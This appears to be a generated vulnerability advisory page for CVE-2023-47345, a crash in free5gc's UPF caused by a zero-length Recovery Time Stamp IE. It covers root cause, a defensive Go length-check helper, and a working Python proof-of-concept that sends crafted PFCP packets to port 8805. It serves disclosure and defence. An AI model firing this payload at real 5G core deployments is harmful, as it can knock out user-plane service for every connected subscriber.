VYPR
High severity · NVD Advisory · Published Nov 15, 2023 · Updated Aug 29, 2024

CVE-2023-47345

Description

Buffer overflow in free5gc 3.3.0 allows denial of service via a crafted PFCP Heartbeat message with a zero-length Recovery Time Stamp IE.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

CVE-2023-47345 describes a buffer overflow vulnerability in the free5gc User Plane Function (UPF) component, version 3.3.0. The bug is triggered by a crafted PFCP Heartbeat request where the Recovery Time Stamp Information Element (IE) has its length field set to zero. This causes the UPF to mishandle the message, leading to a memory access violation [1][2].

Exploitation

An attacker can exploit this vulnerability by sending a malicious UDP packet to the UPF's PFCP port (usually 8805) from a network-accessible position. No authentication is required; the attacker only needs to be able to send PFCP messages to the target UPF. The proof-of-concept script sends a malformed Heartbeat request after establishing an association, causing the UPF to crash [1].

Impact

Successful exploitation results in a denial of service (DoS), crashing the UPF and disrupting 5G core network functionality. Since the UPF is a critical component for user data handling, its downtime can affect service availability for all users connected through that UPF [1][2].

Mitigation

As of the advisory, free5gc version 3.3.0 is vulnerable; no official patch has been released. Users are advised to monitor the free5gc repository for updates or apply defensive measures such as filtering PFCP messages at the network edge to block malformed packets. The issue was reported on the free5gc GitHub issue tracker [1].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

| Package | Affected versions | Patched versions |
|---|---|---|
| github.com/free5gc/free5gc (Go) | <= 3.3.0 | |

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing length validation in PFCP IE parsing allows a zero-length Recovery Time Stamp IE to trigger a slice bounds out-of-range panic."

Attack vector

An attacker sends a crafted PFCP Heartbeat Request message over UDP to the UPF's PFCP port (8805). The message contains a Recovery Time Stamp Information Element whose length field is set to zero [1]. When the UPF parses this malformed IE, the `ParseMultiIEs` function attempts to read a slice with an out-of-bounds length, causing a Go runtime panic that crashes the UPF process [1]. The attacker must first establish a PFCP association (by sending a valid Association Setup Request) before the Heartbeat Request is processed [1].

Affected code

The crash occurs in the `go-pfcp` library used by free5gc's UPF. The stack trace shows the panic originates at `ie.go:637` in `ParseMultiIEs` and `heartbeat-request.go:101` in `UnmarshalBinary`, called from `pfcp.go:125` in the UPF's PFCP server main loop [1]. The vulnerable code path is in the parsing of PFCP Heartbeat Request messages where the Recovery Time Stamp IE length is zero.

What the fix does

No patch is provided in the bundle. The advisory recommends checking the IE length of PFCP messages before parsing, and either updating the handling logic or dropping malformed messages to avoid crashes [1]. The root cause is that the `go-pfcp` library's `ParseMultiIEs` function does not validate that the declared IE length is within the bounds of the remaining buffer, leading to a slice bounds out-of-range panic when a zero-length IE is encountered [1].
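The pre-parse length check recommended above, written as an added Go example (not code from free5gc or go-pfcp). `ValidatePFCP` is a hypothetical helper; `pocHeartbeat` is the Heartbeat Request from this page's reproduction script and `goodHeartbeat` is a constructed well-formed variant.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

const ieRecoveryTimeStamp = 96 // IE type in 3GPP TS 29.244; its value is 4 octets

// Heartbeat Request from the reproduction script, and a constructed variant with IE length 4.
var pocHeartbeat = []byte("\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x00\xe8\x1f\xe7\xb4")
var goodHeartbeat = []byte("\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x04\xe8\x1f\xe7\xb4")

// ValidatePFCP is a hypothetical helper, not part of go-pfcp. It walks the header
// and each top-level IE and returns an error rather than slicing past the datagram.
func ValidatePFCP(b []byte) error {
	if len(b) < 8 {
		return fmt.Errorf("short PFCP header: %d octets", len(b))
	}
	hdr := 8
	if b[0]&0x01 != 0 { // S flag set: an 8-octet SEID follows the length field
		hdr = 16
	}
	end := 4 + int(binary.BigEndian.Uint16(b[2:4])) // length excludes the first 4 octets
	if end > len(b) || end < hdr {
		return fmt.Errorf("message length %d disagrees with datagram size %d", end, len(b))
	}
	for off := hdr; off < end; {
		if end-off < 4 {
			return fmt.Errorf("truncated IE header at offset %d", off)
		}
		typ := binary.BigEndian.Uint16(b[off:])
		n := int(binary.BigEndian.Uint16(b[off+2:]))
		off += 4
		if n > end-off {
			return fmt.Errorf("IE type %d declares %d octets, %d remain", typ, n, end-off)
		}
		if typ == ieRecoveryTimeStamp && n != 4 {
			return fmt.Errorf("recovery time stamp IE has length %d, want 4", n)
		}
		off += n
	}
	return nil
}

func main() {
	fmt.Println("reproduction heartbeat:", ValidatePFCP(pocHeartbeat))
	fmt.Println("well-formed heartbeat: ", ValidatePFCP(goodHeartbeat))
}
```

Run on each datagram before it reaches the message decoder, a non-nil result is the signal to drop the message and log the sender.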

Preconditions

  • network: Attacker must be able to send UDP packets to the UPF's PFCP port (8805)
  • input: A valid PFCP association must be established before the malformed Heartbeat Request is processed

Reproduction

Build and run the UPF with default config/upfcfg.yaml. Execute the following Python script against 127.0.0.8:8805 [1]:

```python
import socket

udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.settimeout(1.0)

# PFCP Association Setup Request (message type 5)
pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00'
# PFCP Heartbeat Request (message type 1); the Recovery Time Stamp IE (type 0x0060) declares length 0
pfcp_heartbeat_request = b'\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x00\xe8\x1f\xe7\xb4'

udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805))
try:
    udp_socket.recv(65535)
except Exception as e:
    print(f"Receive failed: {e}")

udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805))
try:
    udp_socket.recv(65535)
except Exception as e:
    print(f"Receive failed: {e}")

udp_socket.close()
```

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3
